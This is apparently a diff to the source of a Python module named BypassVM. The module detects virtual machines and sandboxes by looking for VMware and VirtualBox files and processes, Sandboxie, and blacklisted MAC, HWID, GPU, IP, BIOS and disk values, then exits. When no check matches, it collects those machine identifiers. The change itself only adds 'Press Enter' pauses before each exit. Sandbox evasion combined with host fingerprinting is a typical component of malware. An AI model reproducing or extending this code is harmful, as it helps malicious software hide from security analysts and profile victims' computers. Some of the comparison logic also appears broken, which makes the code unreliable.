@@ -21,7 +21,7 @@ def in_virtualenv():
 
 if in_virtualenv() == True: # if we are in a vm
     mark("in_virtualenv")
-    os._exit(1) # exit
+    input("Press Enter"); os._exit(1) # exit
     
 class BypassVM:
 
@@ -31,7 +31,7 @@ class BypassVM:
         
         if reg1 != 1 and reg2 != 1:
             mark("registry_check")
-            os._exit(1)
+            input("Press Enter"); os._exit(1)
 
     def processes_and_files_check(self):
         vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")
@@ -45,20 +45,20 @@ class BypassVM:
 
         if "VMwareService.exe" in processList or "VMwareTray.exe" in processList:
             mark("VMwareService.exe")
-            os._exit(1)
+            input("Press Enter"); os._exit(1)
                            
         if os.path.exists(vmware_dll): # Detect vmware dll
             mark("vmware_dll")
-            os._exit(1)
+            input("Press Enter"); os._exit(1)
             
         if os.path.exists(virtualbox_dll): # Detect virtualbox dll
             mark("virtualbox_dll")
-            os._exit(1)
+            input("Press Enter"); os._exit(1)
         
         try:
             sandboxie = ctypes.cdll.LoadLibrary("SbieDll.dll") # Detect sandbox dll
             mark("sandboxie")
-            os._exit(1)
+            input("Press Enter"); os._exit(1)
         except: pass
 
     def mac_check(self):    # Mac detect
@@ -68,7 +68,7 @@ class BypassVM:
         for i in mac_address.splitlines():
             if i == mac_address:
                 mark("mac_address")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
             else: add_info(f"Mac Address:{mac_address}")
     
     def check_pc(self):     # User/Name Detect
@@ -79,14 +79,14 @@ class BypassVM:
         for i in vm_name.splitlines():
             if i == vmname:
                 mark("vmname")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
             else: add_info(f"VM Name:{vmname}")
         
         host_name = socket.gethostname()
         for i in vmusername.splitlines():
             if i == host_name:
                 mark("host_name")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
             else: add_info(f"Host Name:{host_name}")
                 
     def hwid_vm(self):      # HWID detect
@@ -96,7 +96,7 @@ class BypassVM:
         for i in hwid_vm.splitlines():
             if i == current_machine_id:
                 mark("current_machine_id")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
             else: add_info(f"Machine ID:{current_machine_id}")
             
     def checkgpu(self):     # GPU Detect
@@ -108,7 +108,7 @@ class BypassVM:
 
             if GPUm in gpulist:
                 mark("GPUm")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
 
             else: add_info(f"GPU:{GPUm}")
 
@@ -120,7 +120,7 @@ class BypassVM:
         for i in ip_list.splitlines():
             if i == ip:
                 mark("ip")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
             else: add_info(f"IP:{ip}")
             
     def profiles():         # Guids / Bios Detect etc
@@ -139,14 +139,14 @@ class BypassVM:
         for i in guid_pc.splitlines():
             if i == machine_guid:
                 mark("machine_guid")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
 
             else: add_info(f"Machine Guid:{machine_guid}")
 
         for i in serial_list.splitlines():
             if i == serial_:
                 mark("serial_")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
 
             else: add_info(f"Serial:{serial_}")
 
@@ -155,7 +155,7 @@ class BypassVM:
 
             if hw_profile_guid in hwprid:
                 mark("hw_profile_guid")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
 
             else: add_info(f"Profile Guid:{hw_profile_guid}")
 
@@ -164,7 +164,7 @@ class BypassVM:
 
             if bios_check in bios_guid:
                 mark("bios_check")
-                os._exit(1) 
+                input("Press Enter"); os._exit(1) 
 
             else: add_info(f"BIOS:{bios_check}")
 
@@ -173,7 +173,7 @@ class BypassVM:
 
             if base_check in baseboard_guid:
                 mark("base_check")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
 
             else: add_info(f"Motherboard:{base_check}")
 
@@ -182,7 +182,7 @@ class BypassVM:
 
             if disk_serial in serial_disk:
                 mark("disk_serial")
-                os._exit(1)
+                input("Press Enter"); os._exit(1)
 
             else: add_info(f"Disk:{disk_serial}")
         #endregion
